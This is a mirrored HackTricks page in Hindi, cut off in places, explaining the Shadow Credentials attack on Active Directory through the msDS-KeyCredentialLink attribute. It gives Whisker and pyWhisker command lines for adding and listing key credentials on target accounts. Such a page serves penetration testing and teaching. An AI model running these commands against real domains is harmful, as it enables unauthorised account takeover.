mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 06:30:37 +00:00
3.5 KiB
3.5 KiB
छाया प्रमाणपत्र
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
- क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का एक्सेस चाहिए? सब्सक्रिप्शन प्लान्स की जांच करें!
- द पीएएस परिवार की खोज करें, हमारा विशेष एनएफटीज़ संग्रह।
- आधिकारिक पीएएस और HackTricks स्वैग प्राप्त करें।
- शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या मुझे ट्विटर पर फॉलो करें 🐦@carlospolopm।
- अपने हैकिंग ट्रिक्स साझा करें, hacktricks रेपो और hacktricks-cloud रेपो में पीआर जमा करके।
परिचय
इस तकनीक के बारे में सभी जानकारी के लिए मूल पोस्ट की जांच करें।
सारांश में: यदि आप किसी उपयोगकर्ता/कंप्यूटर के msDS-KeyCredentialLink गुण को लिख सकते हैं, तो आप उस ऑब्ज
Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1
pyWhisker
यह UNIX-आधारित सिस्टम पर Whisker क्षमताओं को बढ़ाता है, Impacket और PyDSInternals का उपयोग करके पूर्ण शोषण क्षमताओं के लिए, जैसे KeyCredentials की सूची, जोड़ना, और हटाना, साथ ही उन्हें JSON प्रारूप में आयात और निर्यात करना।
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list"
शैडोस्प्रे
शैडोस्प्रे का उद्देश्य है **डोमेन ऑब्ज